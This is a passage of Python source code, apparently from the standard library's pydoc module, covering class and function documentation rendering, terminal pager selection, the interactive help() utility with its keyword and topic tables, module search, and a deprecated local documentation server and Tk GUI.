if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', '\n'.join(submodules))
if classes:
classlist = [value for key, value in classes]
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', '\n'.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', '\n'.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', '\n'.join(contents))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % ', '.join(parents)
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if hasattr(value, '__call__') or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name)]
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(contents.rstrip(), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % classname(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.__func__
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, kwonlyargs, kwdefaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
class _PlainTextDoc(TextDoc):
"""Subclass of TextDoc which overrides string styling"""
def bold(self, text):
return text
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if not hasattr(sys.stdout, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(text).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write('\n'.join(lines[:inc]) + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + '\n'.join(lines[r:r+inc]) + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in path.split('.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport('.'.join(parts[:n+1]), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(builtins, path):
return getattr(builtins, path)
# --------------------------------------- interactive interpreter interface
text = TextDoc()
plaintext = _PlainTextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError('no Python documentation found for %r' % thing)
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0,
renderer=None):
"""Render text documentation, given an object or a path to an object."""
if renderer is None:
renderer = text
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + renderer.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0,
output=None):
"""Display text documentation, given an object or a path to an object."""
try:
if output is None:
pager(render_doc(thing, title, forceload))
else:
output.write(render_doc(thing, title, forceload, plaintext))
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w', encoding='utf-8')
file.write(page)
file.close()
print('wrote', name + '.html')
except (ImportError, ErrorDuringImport) as value:
print(value)
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'nonlocal NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'nonlocal': ('nonlocal', 'global NAMESPACES'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "b'", '"""', '"', 'r"', 'b"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = replace(request, '"', '', "'", '').strip()
if request.lower() in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using input() when appropriate."""
if self.input is sys.stdin:
return input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(request.split()[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:', output=self._output)
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:', output=self._output)
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = list(sorted(items))
colw = width // columns
rows = (len(items) + columns - 1) // columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw - 1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(doc.strip() + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import formatter
buffer = io.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + ', '.join(xrefs.split()) + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def _gettopic(self, topic, more_xrefs=''):
"""Return unbuffered tuple of (topic, xrefs).
If an error occurs here, the exception is caught and displayed by
the url handler.
This function duplicates the showtopic method but returns its
result directly so it can be formatted for display in an html page.
"""
try:
import pydoc_data.topics
except ImportError:
return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''' , '')
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
raise ValueError('could not find topic')
if isinstance(target, str):
return self._gettopic(target, more_xrefs)
label, xrefs = target
doc = pydoc_data.topics.topics[label]
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
return doc, xrefs
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if modname.find('.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = key.lower()
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
name = __import__(modname).__doc__ or ''
desc = name.split('\n')[0]
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
# XXX Skipping this file is a workaround for a bug
# that causes python to crash with a segfault.
# http://bugs.python.org/issue9319
#
# TODO Remove this once the bug is fixed.
if modname in {'test.badsyntax_pep3120', 'badsyntax_pep3120'}:
continue
if key is None:
callback(None, modname, '')
else:
try:
loader = importer.find_module(modname)
except SyntaxError:
# raised by tests for bad coding cookies or BOM
continue
if hasattr(loader, 'get_source'):
try:
source = loader.get_source(modname)
except UnicodeDecodeError:
if onerror:
onerror(modname)
continue
desc = source_synopsis(io.StringIO(source)) or ''
if hasattr(loader, 'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
try:
module = loader.load_module(modname)
except ImportError:
if onerror:
onerror(modname)
continue
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print(modname, desc and '- ' + desc)
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- Web browser interface
def serve(port, callback=None, completer=None):
import http.server, email.message, select
msg = 'the pydoc.serve() function is deprecated'
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class DocHandler(http.server.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(html.page(title, contents).encode('utf-8'))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport as value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = [x for x in sys.builtin_module_names if x != '__main__']
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + ' '.join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts Web server and pops up a control window)."""
msg = ('the pydoc.gui() function and "pydoc -g" option are deprecated\n',
'use "pydoc.browse() function and "pydoc -b" option instead.')
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import tkinter
self.server_frm = tkinter.Frame(window)
self.title_lbl = tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = tkinter.Frame(window)
self.search_lbl = tkinter.Label(self.search_frm, text='Search for')
self.search_ent = tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = tkinter.Scrollbar(window,
